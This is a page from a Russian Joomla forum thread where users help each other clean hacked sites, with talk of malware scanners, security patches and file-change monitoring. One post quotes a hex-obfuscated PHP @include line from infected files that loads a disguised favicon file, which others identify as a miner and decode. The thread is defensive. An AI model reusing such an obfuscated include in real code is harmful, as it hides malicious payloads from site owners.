Новости Joomla

Вышли релизы Joomla 5.1.0 и Joomla 4.4.4

Проблема с id в URL материалов Joomla при обновлении большого старого сайта до Joomla 5

В старых версиях Joomla URL адрес формировался по схеме [id материала + алиас материала]. Например, 145-my-article-alias. Однако. старый роутер Joomla был не идеален и плодил дубли страниц, с чем усиленно боролись СЕО специалисты с помощью различных плагинов и хаков ядра CMS.

Используем поля Joomla для фильтрации материалов

Перевод статьи одного из разработчиков ядра Joomla Брайана Тимэна (Brian Teeman).

1 ... 19 20 21 22 23   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 243971 Просмотров
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #600 : 14.02.2018, 16:54:09 »
Цитата: Vlasnov от 14.02.2018, 16:43:16
айболит не получается запустить даже под виндой
Да нормально он запускается, только вчера скачивал проверял. Я как раз версию для Windows обычно юзаю.
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #601 : 14.02.2018, 16:57:02 »
Цитата: SeBun от 14.02.2018, 16:54:09
Да нормально он запускается, только вчера скачивал проверял. Я как раз версию для Windows обычно юзаю.
Попробую еще несколько версия Visual скачать. Какой патч установить не понял.
Записан
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #602 : 14.02.2018, 17:11:34 »
Цитата: Vlasnov от 14.02.2018, 16:57:02
Попробую еще несколько версия Visual скачать. Какой патч установить не понял.
:dry:

Если что, я имел ввиду это. А точнее виндючую версию.
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #603 : 14.02.2018, 17:23:39 »
Выдает ошибку библиотеки. Обновления указанные в статье установлены
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #604 : 14.02.2018, 19:01:15 »
Цитата: Vlasnov от 14.02.2018, 15:47:58
В некоторых создаваемых файлах есть во  такое содержимое
Код
@include "\x2fhome\x2fuser\x73/v/v\x6casno\x7653/d\x6fmain\x73/eas\x79vn.r\x75/ass\x65ts/e\x78port\x2fotdy\x69x-v-\x6bryim\x75/fav\x69con_\x652616\x66.ico";
Майнер. Кто хостер ?
Записан
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #605 : 14.02.2018, 22:56:04 »
https://github.com/joomla/joomla-cms/releases/download/3.4.7/SessionHardening25v1.zip Этот. Хотя уже поздно. Вообще что там установлено и какие версии. Сколько сайтов на хостинге всего?

Почему не получается запустить айболит у вас я не знаю. У меня под виндой все работает или в open server обычный для частных пользователей. Проверяю им бывает компоненты не из jed, кроме ручной проверки.
« Последнее редактирование: 14.02.2018, 22:59:14 от wishlight »
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #606 : 15.02.2018, 02:21:55 »
Цитата: draff от 14.02.2018, 19:01:15
Код
@include "\x2fhome\x2fuser\x73/v/v\x6casno\x7653/d\x6fmain\x73/eas\x79vn.r\x75/ass\x65ts/e\x78port\x2fotdy\x69x-v-\x6bryim\x75/fav\x69con_\x652616\x66.ico";
Майнер. Кто хостер ?
jino
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #607 : 15.02.2018, 02:29:07 »
Цитата: wishlight от 14.02.2018, 22:56:04
Сколько сайтов на хостинге всего?
2, Один не Joomla. Сторонних плагинов нет, кроме ARI Image Slider.В остальном полностью чистый Joomla
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #608 : 15.02.2018, 07:16:33 »
Цитата: Vlasnov от 15.02.2018, 02:21:55
\x2fhome\x2fuser\x73/v/v\x6casno\x7653/d\x6fmain\x73/eas\x79vn.r\x75/ass\x65ts/e\x78port\x2fotdy\x69x-v-\x6bryim\x75/fav\x69con_\x652616\x66.ico
Decode
Код
/home/users/v/vlasnov53/domains/easyvn.ru/assets/export/otdyix-v-kryimu/favicon_e2616f.ico
Айболит можно запускать и в консоли хостинга.
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #609 : 15.02.2018, 19:00:18 »
Цитата: draff от 15.02.2018, 07:16:33
Decode
Код
/home/users/v/vlasnov53/domains/easyvn.ru/assets/export/otdyix-v-kryimu/favicon_e2616f.ico
Айболит можно запускать и в консоли хостинга.
Через что декодировать?
Записан
*

arma

  • Завсегдатай
  • 1753
  • 81 / 3
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #610 : 15.02.2018, 19:07:48 »
Hex Decoder любой
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #611 : 15.02.2018, 19:50:11 »
Цитата: Vlasnov от 15.02.2018, 19:00:18
Через что декодировать?
Я уже. Ищите майнер по пути.
Записан
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #612 : 15.02.2018, 21:31:09 »
нашел. удалил, спасибо
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #613 : 03.04.2018, 08:08:52 »
Каждую ночь заливают кучу файлов на сайт :o. Стоит Joomla 1.5.26, поставил все патчи безопасности, все равно одна и та же история. Помогите
Спойлер
[свернуть]
Записан
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #614 : 03.04.2018, 08:24:04 »
Цитата: genius от 03.04.2018, 08:08:52
Каждую ночь заливают кучу файлов на сайт :o. Стоит Joomla 1.5.26, поставил все патчи безопасности

Какие компоненты и какой версии установлены на сайте? Сколько сайтов на аккаунте? Скорее всего после первого заражения не дочистили. Может логичнее мигрировать контент на 3 Joomla?
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #615 : 03.04.2018, 08:41:10 »
кроме стандартных стоит jcooments - думал через него заливают, удалил полностью, все равно также заливают.
Xmap 1.2.6
Плагины: mavik Thumbnails, UA and RU Alias Plugin, HP Router.
Сегодня установил jHackGuard и поставил все включенные опции.
На хостинге 4 сайта, 2 сайта на Joomla 1 на них не появляются файлы.
2 сайта на Joomla 1.5.26 на обоих примерно одинаково все заливают.
Уже подумываю пытаться переходить на 3 версию, но читаю ее тоже постоянно ломают. И смена урлов очень пугает в плане позиций. хотя Яндекс из-за редиректов на вирусные сайты итак понизил.
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #616 : 03.04.2018, 08:43:22 »
Удалял все файлы которые находил айболит в параноидальном режиме, не помогло, дыра осталась.
Также удалял все что находил докторвеб, тоже не помогло.
Происходит это все где то с начала марта, до этого годами работало в таком режиме и все было нормально
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #617 : 03.04.2018, 08:56:00 »
Цитата: genius от 03.04.2018, 08:41:10
2 сайта на Joomla 1 на них не появляются файлы.
2 сайта на Joomla 1.5.26 на обоих примерно одинаково все заливают.
для Joomla 1.5.26 установлен патч сессий ?
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #618 : 03.04.2018, 09:11:17 »
SessionHardening15v1
UploadFix15v3
Устанавливал 2 этих патча, сначала одну ночь только на одном сайте появились файлы, подумал что патч некоректно залил на нем, перезалил, сегодня на обоих появились левые файлы.
Один сайт переносил на другой хостинг, думал может в хосте дело, брал пробный период хостинга на 30 дней и на нем был только один сайт 1.5.26, все равно файлы снова подкинули.
Записан
*

ProtectYourSite

  • Живу я здесь
  • 2356
  • 135 / 4
  • Безопасность вебсайтов
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #619 : 03.04.2018, 09:24:57 »
Цитата: genius от 03.04.2018, 08:41:10
На хостинге 4 сайта, 2 сайта на Joomla 1 на них не появляются файлы.
Если сайты не изолированы, то надо все прочистить и устранить дыры, а так будет постоянно вирус попадать, хоть на 3 Joomla, хоть на 1.5
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #620 : 03.04.2018, 09:43:04 »
Цитата: ProtectYourSite от 03.04.2018, 09:24:57
Если сайты не изолированы, то надо все прочистить

Чтобы исключить заражение от соседних сайтов, перенес сайт на другой, новый хостинг и аккуант, заражение полностью повторилось.
Записан
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #621 : 03.04.2018, 10:17:42 »
Разделить сайты вообще. Да и Xmap ваш к примеру дырявый как решето вроде как. Обновлять хотя бы до актуальных надо. Кстати, в роутере по моему там особо ничего не меняется и если сохранить структуру меню и категорий с алиасами, то все будет так же.
Записан
*

ProtectYourSite

  • Живу я здесь
  • 2356
  • 135 / 4
  • Безопасность вебсайтов
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #622 : 03.04.2018, 12:07:37 »
Цитата: genius от 03.04.2018, 09:43:04
перенес сайт на другой, новый хостинг и аккуант, заражение полностью повторилось.
Значит не полностью вычистили/закрыли дыры.
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #623 : 04.04.2018, 07:55:25 »
Ночью сайт который пусть будет №1 (который не переносил на другой хостинг) подвергся как всегда замене файлов, jHackGuard не помог, лог атаки не создал.
Сайт №2 который переносил пока что чист.
Спойлер
[свернуть]
« Последнее редактирование: 04.04.2018, 08:17:12 от genius »
Записан
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #624 : 04.04.2018, 08:27:30 »
Он и не создаст, если ее не было, а просто залиты файлы через загрузчик какой-то не удаленный.
Записан
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #625 : 04.04.2018, 08:53:54 »
Цитата: wishlight от 04.04.2018, 08:27:30
Он и не создаст, если ее не было, а просто залиты файлы через загрузчик какой-то не удаленный.
В логах хостинга есть обращения к залитым файлам, он их тоже пропускает?
Записан
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #626 : 04.04.2018, 20:09:35 »
Я бы все таки обновил. В вашем случае нужно проверять весь сайт, причем смотреть глазами специалиста, а не айболита. Всякие расширения для защиты - они сами могут содержать уязвимости, не думали об этом? Лично мне кажется, что вы все таки что то не удалили. Что за сайт у вас?
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

genius

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #627 : 05.04.2018, 07:27:42 »
Цитата: SeBun от 04.04.2018, 20:09:35
Что за сайт у вас?
Если про адрес сайта то - prokat73.ru
Уже склоняюсь к переезду на новую версию.
Сегодня файлы были залиты наоборот, №1 чист, №2 весь в файлах.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #628 : 05.04.2018, 08:14:57 »
Дружище, залей снова сайт, и поставь скрипт отслеживания изменений. https://github.com/lucanos/Tripwire/blob/master/tripwire.php
Настрой его и он тебе на почту вышлет вторжение. Потом посмотри логи и все поймешь.
Будет изменение файла с датой отчета. Лог веб сервера скажет как это произошло в диапазоне вторжения.

Это будет выглядеть примерно так

Tripwire (https://github.com/lucanos/Tripwire) has detected a number of changes:

0 Files Added:
No Files

2 Files Modified:
./logs/error.php
./logs/sh404sef/sec/log_2018-02-sh404SEF_security_log.218.log.php

0 Files Deleted:
No Files
« Последнее редактирование: 05.04.2018, 08:32:14 от capricorn »
Записан
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Компоненты и скрипты для защиты сайта. Логи атак на сайты
« Ответ #629 : 05.04.2018, 09:42:55 »
Цитата: genius от 05.04.2018, 07:27:42
склоняюсь к переезду на новую версию.
Глянул на ваш сайт. Берете шаблончик какой-то и руками за день все переносите на другом хостинге. Там же почти ничего нет, кроме материалов.
Записан
1 ... 19 20 21 22 23   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 325 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 1148 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 1294 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

 Ответов: 0
Просмотров: 482 		Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 1079 		Последний ответ 03.11.2020, 17:36:03
от Cedars